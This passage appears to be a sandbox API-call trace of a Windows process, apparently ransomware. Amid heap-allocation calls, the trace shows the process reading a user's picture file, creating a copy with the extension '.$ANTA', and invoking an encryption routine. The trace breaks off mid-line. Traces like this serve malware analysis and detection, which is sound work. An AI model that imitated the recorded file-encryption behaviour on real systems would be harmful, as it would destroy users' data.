[0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0095.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0095.726] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0095.727] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0095.727] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0095.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0095.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0095.727] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z6qa.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0095.728] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.728] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0095.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0095.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0095.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.728] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0095.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0095.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0095.728] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0095.729] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0095.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0095.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0095.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0095.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0095.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0095.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0095.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0095.731] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0095.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a088 | out: hHeap=0x1780000) returned 1 [0095.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0095.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0095.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0095.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0095.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0095.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0095.731] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z6qa.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0095.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0095.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0095.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0095.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0095.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0095.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0095.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0095.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.732] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0095.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0095.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0095.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0095.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0095.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0095.733] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0095.733] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0095.733] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0095.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0095.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0095.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0095.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0a020 [0095.737] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0095.737] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0095.739] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x23f1, lpOverlapped=0x0) returned 1 [0095.740] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0095.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0095.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0095.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0095.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x123f1) returned 0x4516010 [0095.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0a020 | out: hHeap=0x1780000) returned 1 [0095.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0095.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0095.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0095.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0095.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x123f1) returned 0x4528410 [0095.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.745] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x123f1) returned 0x4516010 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.745] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0095.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0095.746] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0095.746] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0095.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0095.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x123f1) returned 0x4516010 [0095.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0095.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0095.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0095.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x123f1) returned 0x499a008 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0095.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0095.747] RtlAllocateHeap (HeapHandle=0x1780000, 